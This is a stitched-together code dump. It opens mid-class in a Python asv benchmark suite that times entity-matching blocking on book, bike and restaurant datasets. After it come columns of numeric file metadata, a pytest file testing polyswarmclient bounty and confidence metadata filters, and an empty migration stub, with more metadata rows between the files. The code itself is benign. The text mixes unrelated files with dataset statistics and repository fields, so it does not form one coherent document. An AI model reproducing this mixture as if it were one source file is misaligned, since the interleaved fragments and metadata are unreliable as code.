        self.l_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
                               'color', 'model_year']
        self.r_output_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
                               'color', 'model_year']

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B, self.l_block_attr,
                         self.r_block_attr, self.l_output_attrs,
                         self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        del self.A
        del self.B
        del self.l_block_attr
        del self.r_block_attr
        del self.l_output_attrs
        del self.r_output_attrs
class TimeBlockTablesBooks:
    """asv benchmark: tables-level blocking of the 'books' dataset on 'Author'."""

    def setup(self):
        left_csv = os.sep.join([datasets_path, 'books', 'A.csv'])
        right_csv = os.sep.join([datasets_path, 'books', 'B.csv'])
        self.l_block_attr = 'Author'
        self.r_block_attr = 'Author'
        out_attrs = ['Title', 'Author', 'ISBN13', 'Publisher',
                     'Publication_Date']
        self.l_output_attrs = out_attrs
        self.r_output_attrs = list(out_attrs)
        try:
            self.A = mg.read_csv_metadata(left_csv)
            mg.set_key(self.A, 'ID')
            self.B = mg.read_csv_metadata(right_csv)
            mg.set_key(self.B, 'ID')
        except AssertionError:
            print("Dataset \'books\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B,
                         self.l_block_attr, self.r_block_attr,
                         self.l_output_attrs, self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('A', 'B', 'l_block_attr', 'r_block_attr',
                     'l_output_attrs', 'r_output_attrs'):
            delattr(self, attr)
class TimeBlockTablesCitations:
    """asv benchmark: tables-level blocking of the 'citations' dataset on 'year'."""

    def setup(self):
        left_csv = os.sep.join([datasets_path, 'citations', 'A.csv'])
        right_csv = os.sep.join([datasets_path, 'citations', 'B.csv'])
        self.l_block_attr = 'year'
        self.r_block_attr = 'year'
        out_attrs = ['title', 'author', 'year', 'ENTRYTYPE']
        self.l_output_attrs = out_attrs
        self.r_output_attrs = list(out_attrs)
        try:
            self.A = mg.read_csv_metadata(left_csv)
            mg.set_key(self.A, 'ID')
            self.B = mg.read_csv_metadata(right_csv)
            mg.set_key(self.B, 'ID')
        except AssertionError:
            print("Dataset \'citations\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B,
                         self.l_block_attr, self.r_block_attr,
                         self.l_output_attrs, self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('A', 'B', 'l_block_attr', 'r_block_attr',
                     'l_output_attrs', 'r_output_attrs'):
            delattr(self, attr)
class TimeBlockTablesElectronics:
    """asv benchmark: tables-level blocking of the 'electronics' dataset on 'Brand'."""

    def setup(self):
        left_csv = os.sep.join([datasets_path, 'electronics', 'A.csv'])
        right_csv = os.sep.join([datasets_path, 'electronics', 'B.csv'])
        self.l_block_attr = 'Brand'
        self.r_block_attr = 'Brand'
        # The two tables carry differently-named price columns.
        self.l_output_attrs = ['Brand', 'Amazon_Price']
        self.r_output_attrs = ['Brand', 'Price']
        try:
            self.A = mg.read_csv_metadata(left_csv)
            mg.set_key(self.A, 'ID')
            self.B = mg.read_csv_metadata(right_csv)
            mg.set_key(self.B, 'ID')
        except AssertionError:
            print("Dataset \'electronics\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B,
                         self.l_block_attr, self.r_block_attr,
                         self.l_output_attrs, self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('A', 'B', 'l_block_attr', 'r_block_attr',
                     'l_output_attrs', 'r_output_attrs'):
            delattr(self, attr)
class TimeBlockTablesRestaurants:
    """asv benchmark: tables-level blocking of the 'restaurants' dataset on 'PHONENUMBER'."""

    def setup(self):
        left_csv = os.sep.join([datasets_path, 'restaurants', 'A.csv'])
        right_csv = os.sep.join([datasets_path, 'restaurants', 'B.csv'])
        self.l_block_attr = 'PHONENUMBER'
        self.r_block_attr = 'PHONENUMBER'
        out_attrs = ['NAME', 'PHONENUMBER', 'ADDRESS']
        self.l_output_attrs = out_attrs
        self.r_output_attrs = list(out_attrs)
        try:
            self.A = mg.read_csv_metadata(left_csv)
            mg.set_key(self.A, 'ID')
            self.B = mg.read_csv_metadata(right_csv)
            mg.set_key(self.B, 'ID')
        except AssertionError:
            print("Dataset \'restaurants\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B,
                         self.l_block_attr, self.r_block_attr,
                         self.l_output_attrs, self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('A', 'B', 'l_block_attr', 'r_block_attr',
                     'l_output_attrs', 'r_output_attrs'):
            delattr(self, attr)
class TimeBlockCandsetAnime:
    """asv benchmark: candset-level blocking of 'anime' on 'Episodes'.

    setup() first builds the candidate set C by tables-level blocking on
    'Year'; the timed phase re-blocks C on 'Episodes'.
    """

    def setup(self):
        try:
            left = mg.read_csv_metadata(os.sep.join([datasets_path, 'anime', 'A.csv']))
            mg.set_key(left, 'ID')
            right = mg.read_csv_metadata(os.sep.join([datasets_path, 'anime', 'B.csv']))
            mg.set_key(right, 'ID')
            out_attrs = ['Title', 'Year', 'Episodes']
            self.C = snb.block_tables(left, right, 'Year', 'Year',
                                      out_attrs, list(out_attrs))
        except AssertionError:
            print("Dataset \'anime\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit
        self.l_block_attr = 'Episodes'
        self.r_block_attr = 'Episodes'

    def time_block_candset(self):
        # The operation asv times: one candset-level blocking pass.
        snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('C', 'l_block_attr', 'r_block_attr'):
            delattr(self, attr)
class TimeBlockCandsetBikes:
    """asv benchmark: candset-level blocking of 'bikes' on 'model_year'.

    setup() first builds the candidate set C by tables-level blocking on
    'city_posted'; the timed phase re-blocks C on 'model_year'.
    """

    # Extended asv timeout — presumably because building/re-blocking this
    # candidate set is slow (TODO confirm against asv run times).
    timeout = 300.0

    def setup(self):
        try:
            left = mg.read_csv_metadata(os.sep.join([datasets_path, 'bikes', 'A.csv']))
            mg.set_key(left, 'id')
            right = mg.read_csv_metadata(os.sep.join([datasets_path, 'bikes', 'B.csv']))
            mg.set_key(right, 'id')
            out_attrs = ['bike_name', 'city_posted', 'km_driven', 'price',
                         'color', 'model_year']
            self.C = snb.block_tables(left, right, 'city_posted', 'city_posted',
                                      out_attrs, list(out_attrs))
        except AssertionError:
            print("Dataset \'bikes\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit
        self.l_block_attr = 'model_year'
        self.r_block_attr = 'model_year'

    def time_block_candset(self):
        # The operation asv times: one candset-level blocking pass.
        snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('C', 'l_block_attr', 'r_block_attr'):
            delattr(self, attr)
class TimeBlockCandsetBooks:
    """asv benchmark: candset-level blocking of 'books' on 'ISBN13'.

    setup() first builds the candidate set C by tables-level blocking on
    'Author'; the timed phase re-blocks C on 'ISBN13'.
    """

    def setup(self):
        try:
            left = mg.read_csv_metadata(os.sep.join([datasets_path, 'books', 'A.csv']))
            mg.set_key(left, 'ID')
            right = mg.read_csv_metadata(os.sep.join([datasets_path, 'books', 'B.csv']))
            mg.set_key(right, 'ID')
            out_attrs = ['Title', 'Author', 'ISBN13', 'Publisher']
            self.C = snb.block_tables(left, right, 'Author', 'Author',
                                      out_attrs, list(out_attrs))
        except AssertionError:
            print("Dataset \'books\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit
        self.l_block_attr = 'ISBN13'
        self.r_block_attr = 'ISBN13'

    def time_block_candset(self):
        # The operation asv times: one candset-level blocking pass.
        snb.block_candset(self.C, self.l_block_attr, self.r_block_attr)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('C', 'l_block_attr', 'r_block_attr'):
            delattr(self, attr)
| 36.650165
| 80
| 0.571274
| 1,439
| 11,105
| 4.134816
| 0.076442
| 0.081681
| 0.045378
| 0.063529
| 0.861345
| 0.826218
| 0.795798
| 0.792941
| 0.775462
| 0.775462
| 0
| 0.002112
| 0.317785
| 11,105
| 302
| 81
| 36.771523
| 0.783263
| 0.012697
| 0
| 0.733333
| 0
| 0
| 0.159931
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 1
| 0.105882
| false
| 0
| 0.011765
| 0
| 0.156863
| 0.035294
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91476207a7c09f973c95be7dbe81a89a6b95a7fd
| 19,505
|
py
|
Python
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 21
|
2018-09-15T00:12:42.000Z
|
2020-10-28T00:42:59.000Z
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 435
|
2018-09-05T18:53:21.000Z
|
2021-11-30T17:32:10.000Z
|
tests/test_filter.py
|
polyswarm/polyswarm-client
|
1ce057725d7db59c3582e4cd3cf148cde7ddddeb
|
[
"MIT"
] | 3
|
2019-07-26T00:14:47.000Z
|
2021-04-26T10:57:56.000Z
|
from polyswarmclient.filters.bountyfilter import BountyFilter, split_filter
from polyswarmclient.filters.confidencefilter import ConfidenceModifier
from polyswarmclient.filters.filter import Filter, FilterComparison, parse_filters, MetadataFilter
def test_pad_fills_empty_to_length():
    """An empty metadata list is padded with empty dicts up to the requested length."""
    # arrange
    metadata = []
    # act
    padded = MetadataFilter.pad_metadata(metadata, 2)
    # assert
    assert padded == [{}] * 2


# noinspection PyTypeChecker
def test_pad_fills_none_to_length():
    """None metadata is treated like an empty list and padded with empty dicts."""
    # arrange
    metadata = None
    # act
    padded = MetadataFilter.pad_metadata(metadata, 2)
    # assert
    assert padded == [{}] * 2


def test_pad_fills_to_length():
    """A short metadata list keeps its entries and is padded with empty dicts at the tail."""
    # arrange
    metadata = [{'mimetype': 'text/plain'}]
    # act
    padded = MetadataFilter.pad_metadata(metadata, 2)
    # assert
    assert padded == [{'mimetype': 'text/plain'}, {}]


def test_pad_fills_with_none_on_invalid_metadata():
    """Entries rejected as invalid are replaced with empty dicts while padding."""
    # arrange
    metadata = [{'asdf': 'asdf'}]
    # act
    padded = MetadataFilter.pad_metadata(metadata, 2)
    # assert
    assert padded == [{}] * 2


def test_no_pad_on_match_length():
    """A list already at the target length is returned unchanged."""
    # arrange
    metadata = [{'mimetype': 'text/plain'}] * 5
    # act
    padded = MetadataFilter.pad_metadata(metadata, 5)
    # assert
    assert padded == metadata


def test_no_pad_on_too_long():
    """A list longer than the target length is returned unchanged (never truncated)."""
    # arrange
    metadata = [{'mimetype': 'text/plain'}] * 10
    # act
    padded = MetadataFilter.pad_metadata(metadata, 5)
    # assert
    assert padded == metadata
def test_not_excluded():
    """Metadata not matching any reject filter is allowed."""
    # arrange
    bounty_filter = BountyFilter(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
    # assert
    assert allowed


def test_excluded():
    """Metadata matching a reject filter is disallowed."""
    # arrange
    bounty_filter = BountyFilter(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/plain'})
    # assert
    assert not allowed


def test_any_excluded():
    """Matching ANY one of several reject filters is enough to disallow."""
    # arrange
    bounty_filter = BountyFilter(None, [
        Filter('mimetype', FilterComparison.EQ, 'text/plain'),
        Filter('mimetype', FilterComparison.EQ, 'text/html')])
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
    # assert
    assert not allowed


def test_not_accepted():
    """When accept filters exist, non-matching metadata is disallowed."""
    # arrange
    bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
    # assert
    assert not allowed


# NOTE(review): double underscore in the name looks like a typo for
# `test_accepted` — harmless, pytest still collects it.
def test__accepted():
    """Metadata matching an accept filter is allowed."""
    # arrange
    bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/plain'})
    # assert
    assert allowed


def test_scans_artifact_accepted_match_only_one():
    """Matching just ONE of several accept filters is enough to allow."""
    # arrange
    bounty_filter = BountyFilter([Filter('mimetype', FilterComparison.EQ, 'text/plain'),
                                  Filter('mimetype', FilterComparison.EQ, 'text/html')],
                                 None)
    # act
    allowed = bounty_filter.is_allowed({'mimetype': 'text/html'})
    # assert
    assert allowed
# NOTE(review): "penlized" in the name looks like a typo for "penalized" —
# harmless, pytest still collects it.
def test_not_penlized():
    """Metadata not matching a penalize filter leaves confidence unchanged."""
    # arrange
    bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/html'}, 1.0)
    # assert
    assert confidence == 1.0


def test_penalized():
    """Matching a penalize filter scales confidence by 0.8 (1.0 -> 0.8)."""
    # arrange
    bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain'}, 1.0)
    # assert
    assert confidence == 0.8


def test_multiple_penalized():
    """Matching several penalize filters applies the penalty only once."""
    # arrange
    bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain'),
                                              Filter('filesize', FilterComparison.LT, '68')])
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
    # assert
    assert confidence == 0.8


def test_penalized_other_value():
    """The penalty is multiplicative, not a fixed offset (0.5 -> 0.4)."""
    # arrange
    bounty_filter = ConfidenceModifier(None, [Filter('mimetype', FilterComparison.EQ, 'text/plain')])
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain'}, .5)
    # assert
    assert confidence == .4


def test_not_favored():
    """Metadata not matching a favor filter leaves confidence unchanged."""
    # arrange
    bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/html'}, 1.0)
    # assert
    assert confidence == 1.0


def test_favored():
    """Matching a favor filter scales confidence by 1.2 (1.0 -> 1.2)."""
    # arrange
    bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain'}, 1.0)
    # assert
    assert confidence == 1.2


def test_favored_other_value():
    """The favor boost is multiplicative, not a fixed offset (0.5 -> 0.6)."""
    # arrange
    bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')], None)
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain'}, .5)
    # assert
    assert confidence == .6


def test_multiple_favored():
    """Matching several favor filters applies the boost only once."""
    # arrange
    bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain'),
                                        Filter('filesize', FilterComparison.LT, '68')],
                                       None)
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
    # assert
    assert confidence == 1.2


def test_offset():
    """A simultaneous favor and penalize match cancel out to the original value."""
    # arrange
    bounty_filter = ConfidenceModifier([Filter('mimetype', FilterComparison.EQ, 'text/plain')],
                                       [Filter('filesize', FilterComparison.LT, '68')])
    # act
    confidence = bounty_filter.modify({'mimetype': 'text/plain', 'filesize': '21'}, 1.0)
    # assert
    assert confidence == 1.0
# NOTE(review): the `# act` / `# assert` markers in this group were swapped
# in the original (the call was labelled "assert" and vice versa); corrected.
def test_split_filter_becomes_filter():
    """A 'key:value' string is split into an EQ Filter."""
    # arrange
    # act
    text_filter = split_filter(None, None, ['mimetype:text/plain'])
    # assert
    assert text_filter[0] == Filter('mimetype', FilterComparison.EQ, 'text/plain')


def test_split_filter_empty_stays_empty():
    """An empty filter-spec list produces an empty (falsy) result."""
    # arrange
    # act
    text_filter = split_filter(None, None, [])
    # assert
    assert not text_filter


def test_parse_filter_adds_reject():
    """A ('reject', ...) tuple lands in the 'reject' bucket only."""
    # arrange
    # act
    filters = parse_filters(None, None, [('reject', 'mimetype', 'contains', 'text')])
    # assert
    assert not filters.get('accept', None)
    assert filters['reject'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')


def test_parse_filter_adds_accept():
    """An ('accept', ...) tuple lands in the 'accept' bucket only."""
    # arrange
    # act
    filters = parse_filters(None, None, [('accept', 'mimetype', 'contains', 'text')])
    # assert
    assert filters['accept'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
    assert not filters.get('reject', None)


def test_parse_filter_adds_both_accept_and_reject():
    """Mixed accept/reject tuples are routed to their respective buckets."""
    # arrange
    # act
    filters = parse_filters(None, None, [('reject', 'mimetype', 'contains', 'text'),
                                         ('accept', 'mimetype', 'contains', 'pdf')])
    # assert
    assert filters['accept'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'pdf')
    assert filters['reject'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')


def test_parse_filter_adds_favor():
    """A ('favor', ...) tuple lands in the 'favor' bucket only."""
    # arrange
    # act
    filters = parse_filters(None, None, [('favor', 'mimetype', 'contains', 'text')])
    # assert
    assert filters['favor'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
    assert not filters.get('penalize', None)


def test_parse_filter_adds_penalize():
    """A ('penalize', ...) tuple lands in the 'penalize' bucket only."""
    # arrange
    # act
    filters = parse_filters(None, None, [('penalize', 'mimetype', 'contains', 'text')])
    # assert
    assert not filters.get('favor', None)
    assert filters['penalize'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')


def test_parse_filter_adds_both_favor_and_penalize():
    """Mixed favor/penalize tuples are routed to their respective buckets."""
    # arrange
    # act
    filters = parse_filters(None, None, [('favor', 'mimetype', 'contains', 'text'),
                                         ('penalize', 'mimetype', 'contains', 'pdf')])
    # assert
    assert filters['favor'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'text')
    assert filters['penalize'][0] == Filter('mimetype', FilterComparison.CONTAINS, 'pdf')
def test_parse_filter_returns_empty_lists_on_none():
# arrange
# assert
filters = parse_filters(None, None, None)
# act
assert isinstance(filters.get('accept', []), list) and len(filters.get('accept', [])) == 0
assert isinstance(filters.get('reject', []), list) and len(filters.get('reject', [])) == 0
def test_parse_filter_returns_empty_lists_on_empty_list():
# arrange
# assert
filters = parse_filters(None, None, [])
# act
assert isinstance(filters.get('accept', []), list) and len(filters.get('accept', [])) == 0
assert isinstance(filters.get('reject', []), list) and len(filters.get('reject', [])) == 0
def test_filter_comparison_from_lt():
    """'<' parses to FilterComparison.LT."""
    # act  (FIX: arrange/act/assert comment labels were misordered)
    comparison = FilterComparison.from_string('<')
    # assert
    assert comparison == FilterComparison.LT


def test_filter_comparison_from_lte():
    """'<=' parses to FilterComparison.LTE."""
    # act
    comparison = FilterComparison.from_string('<=')
    # assert
    assert comparison == FilterComparison.LTE


def test_filter_comparison_from_gt():
    """'>' parses to FilterComparison.GT."""
    # act
    comparison = FilterComparison.from_string('>')
    # assert
    assert comparison == FilterComparison.GT


def test_filter_comparison_from_gte():
    """'>=' parses to FilterComparison.GTE."""
    # act
    comparison = FilterComparison.from_string('>=')
    # assert
    assert comparison == FilterComparison.GTE


def test_filter_comparison_from_eq():
    """'==' parses to FilterComparison.EQ."""
    # act
    comparison = FilterComparison.from_string('==')
    # assert
    assert comparison == FilterComparison.EQ


def test_filter_comparison_from_contains():
    """'contains' parses to FilterComparison.CONTAINS."""
    # act
    comparison = FilterComparison.from_string('contains')
    # assert
    assert comparison == FilterComparison.CONTAINS


def test_filter_comparison_from_startswith():
    """'startswith' parses to FilterComparison.STARTS_WITH."""
    # act
    comparison = FilterComparison.from_string('startswith')
    # assert
    assert comparison == FilterComparison.STARTS_WITH


def test_filter_comparison_from_endswith():
    """'endswith' parses to FilterComparison.ENDS_WITH."""
    # act
    comparison = FilterComparison.from_string('endswith')
    # assert
    assert comparison == FilterComparison.ENDS_WITH


def test_filter_comparison_from_regex():
    """'regex' parses to FilterComparison.REGEX."""
    # act
    comparison = FilterComparison.from_string('regex')
    # assert
    assert comparison == FilterComparison.REGEX
def test_none_does_not_match():
    """filter(None) is falsy regardless of the comparison."""
    eq_filter = Filter('mimetype', FilterComparison.EQ, 'text/plain')
    assert not eq_filter.filter(None)


def test_gt_matches_larger():
    """GT matches a metadata value larger than the target."""
    gt_filter = Filter('filesize', FilterComparison.GT, '0')
    assert gt_filter.filter({'filesize': '20'})


def test_gt_no_match_smaller_same():
    """GT rejects values smaller than or equal to the target."""
    gt_filter = Filter('filesize', FilterComparison.GT, '30')
    assert not gt_filter.filter({'filesize': '0'})   # smaller
    assert not gt_filter.filter({'filesize': '30'})  # equal


def test_gt_matches_value_int():
    """GT also matches when the metadata value is an int, not a string."""
    gt_filter = Filter('filesize', FilterComparison.GT, '0')
    assert gt_filter.filter({'filesize': 20})


def test_gt_not_match_value_is_string():
    """GT fails cleanly for a non-numeric metadata value."""
    gt_filter = Filter('filesize', FilterComparison.GT, '0')
    assert not gt_filter.filter({'filesize': 'asdf'})


def test_gt_not_match_target_is_string():
    """GT fails cleanly for a non-numeric target."""
    gt_filter = Filter('filesize', FilterComparison.GT, 'asdf')
    assert not gt_filter.filter({'filesize': '0'})


def test_gte_matches_larger_and_same():
    """GTE matches values larger than or equal to the target."""
    gte_filter = Filter('filesize', FilterComparison.GTE, '0')
    assert gte_filter.filter({'filesize': '20'})  # larger
    assert gte_filter.filter({'filesize': '0'})   # equal


def test_gte_no_match_smaller():
    """GTE rejects a smaller value."""
    gte_filter = Filter('filesize', FilterComparison.GTE, '30')
    assert not gte_filter.filter({'filesize': '20'})


def test_gte_not_match_value_is_string():
    """GTE fails cleanly for a non-numeric metadata value."""
    gte_filter = Filter('filesize', FilterComparison.GTE, '0')
    assert not gte_filter.filter({'filesize': 'asdf'})


def test_gte_not_match_target_is_string():
    """GTE fails cleanly for a non-numeric target."""
    gte_filter = Filter('filesize', FilterComparison.GTE, 'asdf')
    assert not gte_filter.filter({'filesize': '0'})


def test_lt_matches_smaller():
    """LT matches a value smaller than the target."""
    lt_filter = Filter('filesize', FilterComparison.LT, '30')
    assert lt_filter.filter({'filesize': '20'})


def test_lt_no_match_larger_same():
    """LT rejects values larger than or equal to the target."""
    lt_filter = Filter('filesize', FilterComparison.LT, '0')
    assert not lt_filter.filter({'filesize': '20'})  # larger
    assert not lt_filter.filter({'filesize': '0'})   # equal


def test_lt_not_match_value_is_string():
    """LT fails cleanly for a non-numeric metadata value."""
    lt_filter = Filter('filesize', FilterComparison.LT, '0')
    assert not lt_filter.filter({'filesize': 'asdf'})


def test_lt_not_match_target_is_string():
    """LT fails cleanly for a non-numeric target."""
    lt_filter = Filter('filesize', FilterComparison.LT, 'asdf')
    assert not lt_filter.filter({'filesize': '0'})


def test_lte_matches_smaller_and_same():
    """LTE matches values smaller than or equal to the target."""
    lte_filter = Filter('filesize', FilterComparison.LTE, '30')
    assert lte_filter.filter({'filesize': '0'})   # smaller
    assert lte_filter.filter({'filesize': '30'})  # equal


def test_lte_no_match_larger():
    """LTE rejects a larger value."""
    lte_filter = Filter('filesize', FilterComparison.LTE, '0')
    assert not lte_filter.filter({'filesize': '20'})


def test_lte_not_match_value_is_string():
    """LTE fails cleanly for a non-numeric metadata value."""
    lte_filter = Filter('filesize', FilterComparison.LTE, '0')
    assert not lte_filter.filter({'filesize': 'asdf'})


def test_lte_not_match_target_is_string():
    """LTE fails cleanly for a non-numeric target."""
    lte_filter = Filter('filesize', FilterComparison.LTE, 'asdf')
    assert not lte_filter.filter({'filesize': '0'})


def test_eq_matches_same_int_strings():
    """EQ matches identical numeric strings."""
    eq_filter = Filter('filesize', FilterComparison.EQ, '2320')
    assert eq_filter.filter({'filesize': '2320'})


def test_eq_matches_same_int():
    """EQ matches an int metadata value against a numeric-string target."""
    eq_filter = Filter('filesize', FilterComparison.EQ, '2320')
    assert eq_filter.filter({'filesize': 2320})


def test_eq_matches_same_string():
    """EQ matches identical plain strings."""
    eq_filter = Filter('filesize', FilterComparison.EQ, 'asdf')
    assert eq_filter.filter({'filesize': 'asdf'})


def test_eq_no_match_different():
    """EQ rejects differing values."""
    eq_filter = Filter('filesize', FilterComparison.EQ, 'asdf')
    assert not eq_filter.filter({'filesize': '2320'})


def test_contains_matches_if_contained():
    """CONTAINS matches a substring of the metadata value."""
    contains_filter = Filter('field', FilterComparison.CONTAINS, 'sdf')
    assert contains_filter.filter({'field': 'asdfg'})


def test_contains_no_match_if_not_contained():
    """CONTAINS rejects a target longer than the value."""
    contains_filter = Filter('field', FilterComparison.CONTAINS, 'asdf')
    assert not contains_filter.filter({'field': 'asd'})


def test_contains_ints_match():
    """CONTAINS works on digit strings too."""
    contains_filter = Filter('field', FilterComparison.CONTAINS, '2')
    assert contains_filter.filter({'field': '123'})


def test_startswith_matches_start():
    """STARTS_WITH matches a prefix of the value."""
    starts_filter = Filter('field', FilterComparison.STARTS_WITH, 'asdf')
    assert starts_filter.filter({'field': 'asdfg'})


def test_startswith_no_match():
    """STARTS_WITH rejects a non-prefix substring."""
    starts_filter = Filter('field', FilterComparison.STARTS_WITH, 'sdf')
    assert not starts_filter.filter({'field': 'asdfg'})


def test_startswith_ints_match():
    """STARTS_WITH works when the metadata value is an int."""
    starts_filter = Filter('field', FilterComparison.STARTS_WITH, '1')
    assert starts_filter.filter({'field': 123})


def test_endswith_matches_end():
    """ENDS_WITH matches a suffix of the value."""
    ends_filter = Filter('field', FilterComparison.ENDS_WITH, 'sdfg')
    assert ends_filter.filter({'field': 'asdfg'})


def test_endswith_no_match():
    """ENDS_WITH rejects a non-suffix substring."""
    ends_filter = Filter('field', FilterComparison.ENDS_WITH, 'asdf')
    assert not ends_filter.filter({'field': 'asdfg'})


def test_endswith_ints_match():
    """ENDS_WITH works when the metadata value is an int."""
    ends_filter = Filter('field', FilterComparison.ENDS_WITH, '23')
    assert ends_filter.filter({'field': 123})


def test_regex_matches():
    """REGEX matches an anchored pattern against the value."""
    regex_filter = Filter('field', FilterComparison.REGEX, '^a.*f$')
    assert regex_filter.filter({'field': 'asdf'})


def test_regex_no_match():
    """REGEX rejects a value the pattern does not match."""
    regex_filter = Filter('field', FilterComparison.REGEX, 'a.*f')
    assert not regex_filter.filter({'field': 'sdf'})


def test_regex_ints_match():
    """REGEX works when the metadata value is an int."""
    regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
    assert regex_filter.filter({'field': 123})


def test_empty_dict_no_match():
    """An empty metadata dict never matches."""
    regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
    assert not regex_filter.filter({})


def test_array_bad_query():
    """Non-dict metadata (a list) simply fails to match."""
    regex_filter = Filter('field', FilterComparison.REGEX, '.*2.*')
    assert not regex_filter.filter([])
| 26.646175
| 101
| 0.658344
| 2,161
| 19,505
| 5.723276
| 0.060157
| 0.043014
| 0.059508
| 0.065168
| 0.882358
| 0.857536
| 0.786384
| 0.758085
| 0.724693
| 0.702054
| 0
| 0.009852
| 0.214201
| 19,505
| 731
| 102
| 26.682627
| 0.79709
| 0.075365
| 0
| 0.512894
| 0
| 0
| 0.10756
| 0
| 0
| 0
| 0
| 0
| 0.240688
| 1
| 0.217765
| false
| 0
| 0.008596
| 0
| 0.226361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e67864fc9166814c94bc88c30e2788f75e502620
| 22
|
py
|
Python
|
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
migrations/645-collection-backfill-slugs.py
|
clouserw/zamboni
|
c4a568b69c1613f27da41d46328b2975cbdc1c07
|
[
"BSD-3-Clause"
] | null | null | null |
def run():
    """Migration entry point — intentionally a no-op (returns None)."""
    pass
| 7.333333
| 10
| 0.545455
| 3
| 22
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.318182
| 22
| 2
| 11
| 11
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
